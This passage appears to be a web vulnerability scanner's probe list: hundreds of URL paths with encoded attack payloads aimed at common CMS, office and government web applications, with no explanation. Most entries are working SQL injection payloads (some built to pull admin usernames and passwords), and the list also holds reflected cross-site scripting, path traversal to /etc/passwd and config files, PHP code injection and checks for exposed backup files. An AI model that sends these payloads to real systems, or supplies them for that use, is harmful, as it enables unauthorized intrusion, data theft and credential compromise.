/system/config/groupTreeXml.jsp?type=group&SG04=1'+UNION+ALL+SELECT+1,CHAR%2859%29%2bCHAR%28106%29,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1-- /system/login.asp /system/login.aspx /system/login.jsp /system/login.php /system/nhome/login.jsp?message=%22)--%3E%3C/script%3E%3Cscript%3Ealert(42873)%3C/script%3E /systems/dept/dept_edit.aspx?CodeId=-4)%20and%201=char(106)--&id=1057 /temp/compiled/pages.lbi.php/%22%3C/form%3E%3CsCripT%3Ealert(42873)%3C/scRipt%3E /templates/ /tender/tender/findlssuingBytender.action?currentPage=1&pageSize=10&returnWayId=0&moneyUseId=0&periodTimeId=0&periodDayId=0&award=2&money1=1%20and%20(select%201%20from%20(select%20count(*),concat(md5(0x221),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%23&money2=1&satate=100 /test.asp /test.aspx /test.jsp /test.php /tj/list.aspx?typeid=1'%20and%20(char(106)%2bchar(106))%3E0-- /tj/total.aspx?act=other&typeid=1%27%20AND%209518%3DCONVERT%28INT%2C%28SELECT%20char%28119%29%2bchar%28101%29%2bchar%2898%29%2bchar%28115%29%2bchar%2899%29%2bchar%2897%29%2bchar%28110%29%2bchar%2858%29%2bchar%28105%29%2bchar%2859%29%2bchar%28102%29%2bchar%28105%29%2bchar%28110%29%2bchar%28100%29%2b%28SELECT%20%28CASE%20WHEN%20%289518%3D9518%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%2bCHAR%28100%29%29%29%29%20AND%20%27xhJK%27%3D%27xhJK /toall/desktop/dbform.asp?fn=&fntxt=&varid=8%20AND%201122%3DCONVERT%28INT%2C%28CHAR%2899%29%2bCHAR%28102%29%2bCHAR%28114%29%2bCHAR%28101%29%2bCHAR%28101%29%2bCHAR%28114%29%2bCHAR%2858%29%2bCHAR%28105%29%2bCHAR%2858%29%2bCHAR%28106%29%2bCHAR%28120%29%29%29 /tools/life/jiufang/?q=%7B%24%7Bexit%28md5%28%27fdsfdsfds%27%29%29%7D%7D /tophp.asp /tp_2_2/real_time_rfc2544_result.jsp?testTime=/../../../../../../../../etc/passwd%00 /treefordevicelog.php?iSub=1&id=-1%20UNION%20SELECT%201%2C2%2Cconcat%28md5%280x4515421%29%2C0x7c%2Cdatabase%28%29%2C0x7c%2Cuser%28%29%29%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%23 /treeformap.php?iSub=1&id=-1%20UNION%20SELECT%201%2C2%2Cconcat%28md5%280x4515421%29%2C0x7c%2Cdatabase%28%29%2C0x7c%2Cuser%28%29%29%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%23 /treeforrecordalarm.php?iSub=1&id=-1%20UNION%20SELECT%201%2C2%2Cconcat%28md5%280x4515421%29%2C0x7c%2Cdatabase%28%29%2C0x7c%2Cuser%28%29%29%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%23 /truexxgk/app/nrglController/loadZwgk?zdjc=reer'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20AND%20'FrOd'='FrOd&type=1 /truexxgk/app/xxgkznController/firstXxgkznByZdjc/'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20-- /tt/trade/register.asp?step=checkdup&checkname=ologinname&checkval=haha'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(104)%7C%7CCHR(107)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(57)%7C%7CCHR(57)%7C%7CCHR(55)))%20FROM%20DUAL)%20--&pk=0 /tuan.php?ctl=order&search=YToxOntzOjc6InNlX25hbWUiO3M6Mjg1OiInIGFuZCAwIHVuaW9uIHNlbGVjdCAxLG1kNSgweDc3NjU2MjczNjM2MTZlKSwzLDQsNSw2LDcsOCw5LDEwLDExLDEyLDEzLDE0LDE1LDE2LDE3LDE4LDE5LDIwLDIxLDIyLDIzLDI0LDI1LDI2LDI3LDI4LDI5LDMwLDMxLDMyLDMzLDM0LDM1LDM2LDM3LDM4LDM5LDQwLDQxLDQyLDQzLDQ0LDQ1LDQ2LDQ3LDQ4LDQ5LDUwLDUxLDUyLDUzLDU0LDU1LDU2LDU3LDU4LDU5LDYwLDYxLDYyLDYzLDY0LDY1LDY2LDY3LDY4LDY5LDcwLDcxLDcyLDczLDc0LDc1LDc2LDc3LDc4LDc5LDgwLDgxLDgyLDgzLDg0ICMiO30= /tuan.php?ctl=subscribe&act=unsubscribe&code=JyBhbmQgKHNlbGVjdC8qKi8gMSBmcm9tLyoqLyAoc2VsZWN0LyoqLyBjb3VudCgqKSxjb25jYXQobWQ1KDExMjIpLGZsb29yKHJhbmQoMCkqMikpeCBmcm9tLyoqLyBpbmZvcm1hdGlvbl9zY2hlbWEudGFibGVzIGdyb3VwIGJ5IHgpYSkj /u.php/member-login?id=header_login%27%22%28%29%26%25%3CScRiPt%20%3Eprompt%2842873%29%3C/ScRiPt%3E&style=1 /u8qx/login_SelectDM.jsp?type=tree&select=slGS&id=inputDW&cdtn=kjnd=-4622%20UNION%20ALL%20SELECT%20CHAR%28113%29%2bCHAR%28107%29%2bCHAR%28107%29%2bCHAR%2898%29%2bCHAR%28113%29%2bCHAR%2875%29%2bCHAR%28122%29%2bCHAR%2874%29%2bCHAR%28103%29%2bCHAR%28118%29%2bCHAR%28103%29%2bCHAR%2888%29%2bCHAR%2875%29%2bCHAR%2879%29%2bCHAR%2887%29%2bCHAR%28118%29%2bCHAR%28121%29%2bCHAR%28122%29%2bCHAR%28107%29%2bCHAR%28115%29%2bCHAR%2886%29%2bCHAR%2873%29%2bCHAR%2885%29%2bCHAR%28118%29%2bCHAR%28104%29%2bCHAR%28119%29%2bCHAR%28108%29%2bCHAR%2879%29%2bCHAR%2885%29%2bCHAR%2865%29%2bCHAR%28102%29%2bCHAR%28100%29%2bCHAR%2868%29%2bCHAR%2899%29%2bCHAR%2887%29%2bCHAR%28101%29%2bCHAR%2883%29%2bCHAR%28106%29%2bCHAR%2869%29%2bCHAR%2880%29%2bCHAR%2868%29%2bCHAR%2890%29%2bCHAR%28106%29%2bCHAR%2897%29%2bCHAR%2882%29%2bCHAR%28113%29%2bCHAR%2898%29%2bCHAR%28112%29%2bCHAR%28112%29%2bCHAR%28113%29,48,48%20--%20- /uapws/ /uapws/service/ /uapws/service/nc.itf.ses.inittool.PortalSESInitToolService?wsdl /uc_server/admin.php /uc_server/data/config.inc.php.bak /uddiexplorer/SearchPublicRegistries.jsp?operator=http://127.0.0.1:80&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search /upload/ /uploads/ /user /user.php?act=is_registered&username=%CE%27360webscan%23 /user.php?back_act=http://127.0.0.1%22style=x:expression(alert(42873))%3E /user/?q=help&type=search&page=1&kw=webscan%22;%20alert(42873);//&lang=zh_CN /user/City_ajax.aspx?Cityid=-1'%20%20union%20%20SELECT%20'webscan',2%20FROM%20fs_sys_User%20WHERE%20id=7%20%20and%20'1'='1 /user/SetNextOptions.asp?sType=1&EquValue=aaaa&SelectName=aaa&ReqSql=select+20120328,admin_pass_word,3,4,5,6,7,8++from+FS_MF_Admin /user/http/httpnews.php?type=html&id=1%20and%201=2%20union%20all%20select%201,@@version,3,md5(0x45154),5,6,7,8,9,10 /user/reg/regajax.asp?action=getcityoption&province=goingta%2527%2520union%2520%2573%2565%256C%2565%2563%2574%25201,username%252B%2527%257C%2527%252Bpassword%2520from%2520KS_Admin%2500 /user/storage_explore.php /user/storage_fold_explore.php /user/userzone/School/download.aspx?f=/config/ConnectionStrings.config /usermanage.php?NodeID=-1%20UNION%20SELECT%201%2Cconcat%28md5%280x4515421%29%2C0x7c%2Cdatabase%28%29%2C0x7c%2Cuser%28%29%29%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%23 /users.ini /users.txt /utilities.php?tail_lines=50&message_type=-1&go.x=10&go.y=9&refresh=20&reverse=1&filter=%22%3E%25%3Cscript%3Eprompt(42873)%3C/script%3E&page=1&action=view_logfile /varset/modifyTime.asp?varname=&id=495'%20union%20all%20select%201,2,3,0x66696E643A76756C,5,6,7,8,9%20from%20teachers%20-- /vc/vc/index/que_index.jsp /venus/AsVenusCA/desk/message/reply.asp /video/videoView.jsp?videoid=250%20AND%201=(SELECT%20CHAR(106)%2bCHAR(58)) /viewlist.aspx?typeid=webscan()' /views.asp /viewthread.php?tid=250523 /viewthread.php?tid=31926 /viewthread.php?tid=8974 /vote.php?act=dovote&name[1%20and%20(select%201%20from(select%20count(*),concat(0x7c,(select%20(Select%20version())%20from%20information_schema.tables%20limit%200,1),0x7c,floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x%20limit%200,1)a)%23][111]=aa /voteresult.aspx?activeid=-1%20UNION%20SELECT%201,char(106)%2bchar(106),3,4,5%20from%20syscolumns%20-- /wap.php?pageBody=%3Cscript%3Ealert(42873)%3C/script%3E /wap/index.php /wap/index.php/admin.php?c=job&pr=-1%20UNI00000000ON%20sel00000000ect%23%0amd5(0x4141),1,md5(0x4141),3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9%23&hy=%0a,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1%23&num=&exp=&edu=%0a%20fro00000000m%20phpyun_admin_user%20limit%201%23&type=&uptime= /wap/index.php?ac=search&at=taglist&tagkey=a%2527 /wap/index.php?ctl=synclogin&post_type=json&login_type=Sina&from=wap&sina_id=-1'%20union%20select%201,2,concat(0x7c,md5(1122),0x7c),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72%23&code=1 /wap/index.php?keywords='and((select%201%20from(select%20count(*),concat((select%20(select%20(SELECT%20CHAR(100,%2056,%20100,%2057,%2048,%2097,%2097,%2057,%2052,%2051,%20101,%2052,%2097,%20100,%20100,%2050)))%20from%20information_schema.tables%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a))and'&mod=search&page=2 /wap/index.php?mod=pm&pm_new=and(select%201%20from(select%20count(*),concat((select%20(select%20(select%20concat(0x27,0x7e,jishigou_members.username,0x27,0x7e,jishigou_members.password,0x27,0x7e)%20from%20jishigou_members%20where%20uid=1%20limit%200,1))%20from%20information_schema.tables%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%20and%201=1 /wap/index.php?mod=search&keywords=%df')%20and%20(select%201%20from%20%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20my_admin%20limit%200,1),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23 /wap/index.php?mod=space&userid=1'%20and%20extractvalue(1,(select%20md5(1122)from%20my_admin%20limit%201));%20%23 /was5/admin/ /wc.db /wcm/infoview.do?serviceid=wcm6_user&MethodName=getUsersByNames&UserNames=admin /web-console/ /web/?id=-1' /web/User_Sort_List.aspx?infoid=2%20and%20char(106)=0 /web/common/getfile.jsp?p=..%5C%5C..%5C%5C..%5C%5C..%5C%5Cetc%5C%5Cpasswd /web/doc_hit.jsp?documentid=-21%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(104)%7C%7CCHR(107)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(57)%7C%7CCHR(57)%7C%7CCHR(55)))%20FROM%20DUAL) /web/server/serverstart.php?machineid=1%27%20and%20%28select%201%20from%20%28select%20count%28%2a%29%2Cconcat%28md5%280x221%29%2Cfloor%28rand%280%29%2a2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%23 /web/systemconfig/guangboinfo.php?id=1%27%20and%20%28select%201%20from%20%28select%20count%28%2a%29%2Cconcat%28md5%280x221%29%2Cfloor%28rand%280%29%2a2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%23&from=list /webConfigSet/configSetting.aspx?url=/login/index.aspx /webSend/entity_show.jsp?unid=-1'%20or%201=2%20--&fileName=webscan.jsp /webUser/webUser!list.action /webadmin/ /webeditor/admin/ /webfm/webUI/uistrings.cgi /weblogin/ /webmail/main/searchAddr.inc.php?value=123%25%27%29%20union%20select%20concat%28tm_name%2C0x23%2Ctm_domain%2C0x23%2Cmd5%280x4141%29%29%2Ctm_passwd%20from%20todaymail%20limit%200%2C1%23&ftm_id=103361 /webmanage/ /webmaster/ /webscan360noThisFile*~1*/.aspx /webscan_360_cn.html /website/approve/approveSiteAction!findApproveGuide.action?businesscode=1'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(119)%7C%7CCHR(101)%7C%7CCHR(98)%7C%7CCHR(115)%7C%7CCHR(99)%7C%7CCHR(97)%7C%7CCHR(110)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(102)%7C%7CCHR(105)%7C%7CCHR(110)%7C%7CCHR(100)))%20FROM%20DUAL)%20--&location=&subcode=000 /website/approve/approveSiteAction!listApproveModel.action?action=search&forward=searchmodel&issueTypename=&style=4&subType=1%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(119)%7C%7CCHR(101)%7C%7CCHR(98)%7C%7CCHR(115)%7C%7CCHR(99)%7C%7CCHR(97)%7C%7CCHR(110)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(102)%7C%7CCHR(105)%7C%7CCHR(110)%7C%7CCHR(100)))%20FROM%20DUAL) /website/approve/convenientSiteAction!getSXList.action?department=1'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(119)%7C%7CCHR(101)%7C%7CCHR(98)%7C%7CCHR(115)%7C%7CCHR(99)%7C%7CCHR(97)%7C%7CCHR(110)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(102)%7C%7CCHR(105)%7C%7CCHR(110)%7C%7CCHR(100)))%20FROM%20DUAL)%20--&mill=488&style=4 /website/dflz/dflzCjAction!caiwugk_list.action?orgCode=&orgName=&zuOrgCode=&zuOrgName=&cwgkbbh=-21'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(104)%7C%7CCHR(107)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(57)%7C%7CCHR(57)%7C%7CCHR(55)))%20FROM%20DUAL)%20--%20&cwgkbmc= /website/level3.jsp?tablename=7&infoid=-1'%20UNION%20ALL%20SELECT%20CHAR%28119%29%2bCHAR%28101%29%2bCHAR%2898%29%2bCHAR%28115%29%2bCHAR%2899%29%2bCHAR%2897%29%2bCHAR%28110%29%2bCHAR%2858%29%2bCHAR%28105%29%2bCHAR%2859%29%2bCHAR%28102%29%2bCHAR%28105%29%2bCHAR%28110%29%2bCHAR%28100%29-- /webusr/check.aspx?loginname=nosec'%20and%201=char(106)%2bchar(106)%20--%20 /wei/js.php?type=like&keyword=1%2527)/**/UNION/**/SELECT/**/1,concat(0x7e,0x7765627363616E3A693A66696E64,0x7e),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51%23 /wescms/sys/order_adjust.php?id_f=1&order_f=2&id=3&dir=up&table=%28select%20count%28%2a%29%2Cconcat%28%28select%20md5%280x7765627363616e%29%29%2C0x7c%2Cfloor%28rand%280%29%2a2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a /witapprovemanage/apprvaddNew.jsp?flowid=%27%20and%201=2%20UNION%20SELECT%201,2,3,4,char(106)%2bchar(60),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29;--%20- /workflow/OfficeFileDownload.aspx?filename=1'%20and%20(select%20char(106)%2bchar(106))%3E0%20-- /workflow/flow_details.aspx?action=details&job_id=-12%20and%201=char(106) /wp-admin /wp-admin/ /wp-config.php.bak /wp-content/ /wp-includes/ /wp-includes/registration-functions.php /wp-includes/registration.php /www/index.php?mod=admin&con=deliver&act=view&deliId=(select%20char(106)%2bchar(58)) /www/index.php?mod=admin&con=user&act=view&id=(select%20char(106)%2bchar(58)) /www/index.php?mod=admin&con=user&act=view&username='%20and%20(select%20char(106)%2bchar(58))=1%20-- /www/item_seach.php?tempsql=and%201=2%20UNION%20SELECT%201,2,concat(0x7c,md5(1122),0x7c),4,5,6,7,8,9,10,11,12,13%23 /wywzlist.aspx?OUGuid=1')%20and%201=char(106)%20--%20 /xampp/index.php /xampp/showcode.php/showcode.php?showcode=1 /xyEmployee_checkLoginForUser.do?userName=reer /yhzc/NewFile.jsp?loginname=admin'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20AND%20'FrOd'='FrOd /yhzc/isFlag.jsp?loginname=admin'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20AND%20'FrOd'='FrOd /yhzc/isPass.jsp?id=1'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20AND%20'FrOd'='FrOd /yp/job.php?action=applylist&genre=-1%2527%20or%20%2527a%2527=%2527a%2527 /yp/job.php?action=list&genre=-1%2527%20or%20%2527a%2527=%2527a%2527 /yp/product.php?pagesize=$%7B@print(md5(42873))%7D /yp/product.php?q=&action=searchlist&where=%23 /yp/web/index.php?userid=999999999999999999999999999999999999&menu=die(md5($_GET%5bscan%5d))%3b&scan=webscan /yushouli/yushouliResult.do?item_ID=1'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20AND%20'1122'='1122 /yyoa/HJ/iSignatureHtmlServer.jsp?COMMAND=SAVESIGNATURE&SIGNATUREID=1&DOCUMENTID=1%25%27%20AND%20%28SELECT%209745%20FROM%28SELECT%20COUNT%28%2a%29%2CCONCAT%280x7175767971%2C%28SELECT%20%28CASE%20WHEN%20%289745%3D9745%29%20THEN%201%20ELSE%200%20END%29%29%2C0x716a656571%2CFLOOR%28RAND%280%29%2a2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%27%25%27%3D%27 /yyoa/common/js/menu/initData.jsp /yyoa/common/js/menu/test.jsp?doType=101&S1=select%20database(); /yyoa/common/js/menu/test.jsp?doType=101&S1=select%20md5(0x4111); /yyoa/common/js/upload/modify.jsp?showPic=%3Cscript%3Ealert(42873)%3C/script%3E /yyoa/ext/https/getSessionList.jsp?cmd=getAll /yyoa/ext/trafaxserver/ExtnoManage/isNotInTable.jsp?user_ids=%281%29%20LIMIT%201%2C1%20UNION%20ALL%20SELECT%20CONCAT%280x3a6f70723a%2C0x4965736f7844706c6b4f%2C0x3a716e7a3a%29%23%29 /yyoa/ext/trafaxserver/ExtnoManage/isNotInTable.jsp?user_ids=(1)%20UNION%20ALL%20SELECT%200x43453B443A4152%23 /yyoa/ext/trafaxserver/SendFax/resend.jsp?fax_ids=(1)%20UNION%20ALL%20SELECT%200x43453B443A4152%23 /yyoa/ext/trafaxserver/ToSendFax/messageViewer.jsp?fax_id=1'%20UNION%20ALL%20SELECT%20NULL,0x43453B443A4152,NULL,NULL%23 /zabbix.sql /zfcgFrame/xx_look.aspx?ID=-1%27%20UNION%20ALL%20SELECT%20char%28119%29%2bchar%28101%29%2bchar%2898%29%2bchar%28115%29%2bchar%2899%29%2bchar%2897%29%2bchar%28110%29%2bchar%2858%29%2bchar%28105%29%2bchar%2859%29%2bchar%28102%29%2bchar%28105%29%2bchar%28110%29%2bchar%28100%29--%20 /zfsmp/sjksz.do /zhanshi/equzhanshi.aspx?equid=-301'%20and%201=char(106)%20-- /zhanshikebiao.aspx?centid=-301%20and%201=char(106)%20--&date=&xyid= /zhanshikebiao.aspx?centid=-301'%20and%201=char(106)%20--&date=&xyid= /zhuti/360webscan' /znSearchAction.do?searchContext=-1%25%27%20UNION%20%20ALL%20SELECT%20%20NULL%2CNULL%2CCHR%28119%29%7C%7CCHR%28101%29%7C%7CCHR%2898%29%7C%7CCHR%28115%29%7C%7CCHR%2899%29%7C%7CCHR%2897%29%7C%7CCHR%28110%29%7C%7CCHR%2858%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7CCHR%28102%29%7C%7CCHR%28105%29%7C%7CCHR%28110%29%7C%7CCHR%28100%29%2CNULL%20FROM%20DUAL%20-- /zplug/ajax_asyn_link.old.php?url=../admin/opacadminpwd.php /zplug/lib_xxx.php?code=huiwen_opac /zwfw/zwfwInfoAction!execute.shtml?action=5&sid='%7C%7C(SELECT%20'ijx'%20FROM%20DUAL%20WHERE%201122=1122%20AND%204567=UTL_INADDR.GET_HOST_ADDRESS((SELECT%20chr(119)%7C%7Cchr(101)%7C%7Cchr(98)%7C%7Cchr(115)%7C%7Cchr(99)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(58)%7C%7Cchr(105)%7C%7Cchr(58)%7C%7Cchr(102)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(100)%20FROM%20dual)))%7C%7C' /zwgkinfo/DepartMentInfoList.aspx?CategoryNum=-12'/**/and/**/1=char(106)--&DeptCode= /zxts_view.aspx?Id=4%20and%201=char(106)%20--&GBType=1 /zy/resource/fileSize/canUpload.do?folderId=document&userId=-12'%20AND%20(SELECT%201%20FROM(SELECT%20COUNT(*),CONCAT(0x23,(SELECT%20md5(1122)),0x23,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)%20and%20'a'='a&spaceName=&totalFileSize=74126 /zyjs.asp?Txy=18&tzy=11'%20/**/and/**/1=char(106)%20--